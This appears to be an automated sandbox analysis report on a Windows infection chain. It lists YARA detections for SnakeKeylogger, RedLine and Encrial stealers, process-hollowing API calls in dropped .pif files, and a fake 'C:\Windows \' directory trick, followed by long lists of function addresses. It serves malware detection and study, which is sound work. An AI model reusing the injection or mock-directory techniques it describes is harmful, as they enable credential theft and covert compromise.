Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.2971876015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D42A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	1_2_029D42A8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D33F8 NtWriteVirtualMemory,	1_2_029D33F8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D30AC NtAllocateVirtualMemory,	1_2_029D30AC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D96E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	1_2_029D96E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D9600 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	1_2_029D9600
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	1_2_029D9578
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D3BBC NtUnmapViewOfSection,	1_2_029D3BBC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D394C NtReadVirtualMemory,	1_2_029D394C
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D42A6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	1_2_029D42A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D30AA NtAllocateVirtualMemory,	1_2_029D30AA
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029D9524 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	1_2_029D9524
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_001540B1 NtQuerySystemInformation,	8_2_001540B1
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00155CF1 NtQueryInformationToken,NtQueryInformationToken,RtlNtStatusToDosError,	8_2_00155CF1
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00155911 PathIsRelativeW,RtlSetSearchPathMode,SearchPathW,GetFileAttributesW,CreateActCtxW,CreateActCtxWWorker,CreateActCtxW,CreateActCtxW,GetModuleHandleW,CreateActCtxW,ActivateActCtx,SetWindowLongW,GetWindowLongW,GetWindow,memset,GetClassNameW,CompareStringW,GetWindow,GetWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,	8_2_00155911
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00154136 HeapSetInformation,NtSetInformationProcess,AttachConsole,LocalAlloc,LoadLibraryExW,GetProcAddress,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,DeactivateActCtx,ReleaseActCtx,FreeLibrary,LocalFree,FreeConsole,ExitProcess,	8_2_00154136
Source: C:\Users\Public\ndpha.pif	Code function: 8_2_00155D6A NtOpenProcessToken,RtlNtStatusToDosError,NtClose,QueryActCtxW,NtOpenProcessToken,NtSetInformationToken,NtClose,	8_2_00155D6A
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A42A8 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	9_2_028A42A8
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A3BBC NtUnmapViewOfSection,	9_2_028A3BBC
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A33F8 NtWriteVirtualMemory,	9_2_028A33F8
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A30AC NtAllocateVirtualMemory,	9_2_028A30AC
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A394C NtReadVirtualMemory,	9_2_028A394C
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A96E4 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	9_2_028A96E4
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A42A6 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	9_2_028A42A6
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A30AA NtAllocateVirtualMemory,	9_2_028A30AA
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A39E6 NtReadVirtualMemory,	9_2_028A39E6
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A9600 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	9_2_028A9600
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A3493 NtWriteVirtualMemory,	9_2_028A3493
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A3C48 NtUnmapViewOfSection,	9_2_028A3C48
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A9524 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_028A9524
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028A9578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	9_2_028A9578

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 1_2_029DAF34 InetIsOffline,Sleep,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,

1_2_029DAF34

Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows \SysWOW64	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

File deleted: C:\Windows \SysWOW64\svchost.pif

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 1_2_029C20B4	1_2_029C20B4
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00408C60	6_2_00408C60
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_0040DC11	6_2_0040DC11
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00407C3F	6_2_00407C3F
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00418CCC	6_2_00418CCC
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00406CA0	6_2_00406CA0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_004028B0	6_2_004028B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_0041A4BE	6_2_0041A4BE
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00408C60	6_2_00408C60
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00418244	6_2_00418244
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00401650	6_2_00401650
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00402F20	6_2_00402F20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_004193C4	6_2_004193C4
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00418788	6_2_00418788
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00402F89	6_2_00402F89
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_00402B90	6_2_00402B90
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_004073A0	6_2_004073A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_1B49C011	6_2_1B49C011
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_1B4932AC	6_2_1B4932AC
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_1B495000	6_2_1B495000
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_1CF71560	6_2_1CF71560
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_1CF7154F	6_2_1CF7154F
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_1CF712C0	6_2_1CF712C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_1CF712B0	6_2_1CF712B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008F0C8	6_2_2008F0C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_200841EA	6_2_200841EA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008B1EE	6_2_2008B1EE
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008D490	6_2_2008D490
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008B4C0	6_2_2008B4C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008B7A0	6_2_2008B7A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_20085860	6_2_20085860
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008AA58	6_2_2008AA58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008BA80	6_2_2008BA80
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008BD61	6_2_2008BD61
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_20085E58	6_2_20085E58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008AF00	6_2_2008AF00
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_20088F18	6_2_20088F18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_20083068	6_2_20083068
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008D480	6_2_2008D480
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008E5D9	6_2_2008E5D9
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008E5E8	6_2_2008E5E8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2008AC20	6_2_2008AC20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21143510	6_2_21143510
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21148568	6_2_21148568
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114B598	6_2_2114B598
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21147820	6_2_21147820
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21140040	6_2_21140040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21140740	6_2_21140740
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21140E40	6_2_21140E40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21143501	6_2_21143501
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114E108	6_2_2114E108
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114E551	6_2_2114E551
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21148558	6_2_21148558
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114E560	6_2_2114E560
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114B58A	6_2_2114B58A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114E9B8	6_2_2114E9B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114E9A8	6_2_2114E9A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114B9F0	6_2_2114B9F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114B9E6	6_2_2114B9E6
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21140006	6_2_21140006
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114D400	6_2_2114D400
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114D858	6_2_2114D858
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114D84A	6_2_2114D84A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21147078	6_2_21147078
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21147088	6_2_21147088
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114DCB0	6_2_2114DCB0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114DCA0	6_2_2114DCA0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114E0F9	6_2_2114E0F9
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114FB18	6_2_2114FB18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114FB09	6_2_2114FB09
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21140732	6_2_21140732
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114CB50	6_2_2114CB50
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114CB40	6_2_2114CB40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114CF98	6_2_2114CF98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21146BB6	6_2_21146BB6
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114CFA8	6_2_2114CFA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114D3F0	6_2_2114D3F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114EE10	6_2_2114EE10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114EE00	6_2_2114EE00
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21140E31	6_2_21140E31
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114F25A	6_2_2114F25A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21147A40	6_2_21147A40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114BE42	6_2_2114BE42
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114BE48	6_2_2114BE48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114F268	6_2_2114F268
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114C296	6_2_2114C296
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114F6B0	6_2_2114F6B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114C2A0	6_2_2114C2A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114F6C0	6_2_2114F6C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114C6F8	6_2_2114C6F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2114C6EA	6_2_2114C6EA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115B9A8	6_2_2115B9A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211565C0	6_2_211565C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21156C18	6_2_21156C18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21157AF0	6_2_21157AF0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21155D10	6_2_21155D10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21156B10	6_2_21156B10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21153918	6_2_21153918
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115B518	6_2_2115B518
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21152300	6_2_21152300
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21155D00	6_2_21155D00
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115B509	6_2_2115B509
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115D508	6_2_2115D508
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21153908	6_2_21153908
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115E739	6_2_2115E739
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21150D38	6_2_21150D38
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21156158	6_2_21156158
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115C758	6_2_2115C758
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115A758	6_2_2115A758
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21150D48	6_2_21150D48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115E748	6_2_2115E748
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115C748	6_2_2115C748
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21153D70	6_2_21153D70
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21153D60	6_2_21153D60
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115A768	6_2_2115A768
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21156168	6_2_21156168
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21151191	6_2_21151191
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115D998	6_2_2115D998
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115B998	6_2_2115B998
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115F982	6_2_2115F982
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115F988	6_2_2115F988
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115D988	6_2_2115D988
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211565B0	6_2_211565B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211541B8	6_2_211541B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211511A0	6_2_211511A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115EBD8	6_2_2115EBD8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115CBDA	6_2_2115CBDA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115EBC9	6_2_2115EBC9
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211541C8	6_2_211541C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115ABF8	6_2_2115ABF8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211515F8	6_2_211515F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115CBE8	6_2_2115CBE8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211515E8	6_2_211515E8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115ABEA	6_2_2115ABEA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21154610	6_2_21154610
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115DE18	6_2_2115DE18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21150006	6_2_21150006
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115BE38	6_2_2115BE38
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21154620	6_2_21154620
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21158020	6_2_21158020
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115DE28	6_2_2115DE28
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115BE28	6_2_2115BE28
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115F057	6_2_2115F057
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21155456	6_2_21155456
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21151A50	6_2_21151A50
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21153058	6_2_21153058
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21151A41	6_2_21151A41
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21150040	6_2_21150040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21154A72	6_2_21154A72
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115D078	6_2_2115D078
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21154A78	6_2_21154A78
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115B07A	6_2_2115B07A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115D067	6_2_2115D067
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21155460	6_2_21155460
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21153068	6_2_21153068
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115F068	6_2_2115F068
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21159290	6_2_21159290
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21150498	6_2_21150498
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21151E98	6_2_21151E98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21150489	6_2_21150489
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115B088	6_2_2115B088
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115C2B7	6_2_2115C2B7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211534B0	6_2_211534B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115E2B8	6_2_2115E2B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211558B8	6_2_211558B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115E2A7	6_2_2115E2A7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211592A0	6_2_211592A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211558A8	6_2_211558A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21151EA8	6_2_21151EA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21154ED0	6_2_21154ED0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115A2D8	6_2_2115A2D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21154EC0	6_2_21154EC0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211534C0	6_2_211534C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115C2C8	6_2_2115C2C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115A2CA	6_2_2115A2CA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211508F0	6_2_211508F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115F4F8	6_2_2115F4F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115D4FA	6_2_2115D4FA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211508E0	6_2_211508E0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21157AE0	6_2_21157AE0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2115F4E8	6_2_2115F4E8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C5438	6_2_211C5438
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C8D98	6_2_211C8D98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C2918	6_2_211C2918
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CDA18	6_2_211CDA18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C9718	6_2_211C9718
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CAF10	6_2_211CAF10
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C6C12	6_2_211C6C12
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C4908	6_2_211C4908
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C8408	6_2_211C8408
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C2908	6_2_211C2908
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CDA0A	6_2_211CDA0A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C5900	6_2_211C5900
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CF200	6_2_211CF200
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C3238	6_2_211C3238
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CED38	6_2_211CED38
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CAA39	6_2_211CAA39
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C1237	6_2_211C1237
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CC230	6_2_211CC230
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C7F30	6_2_211C7F30
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C0032	6_2_211C0032
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C322C	6_2_211C322C
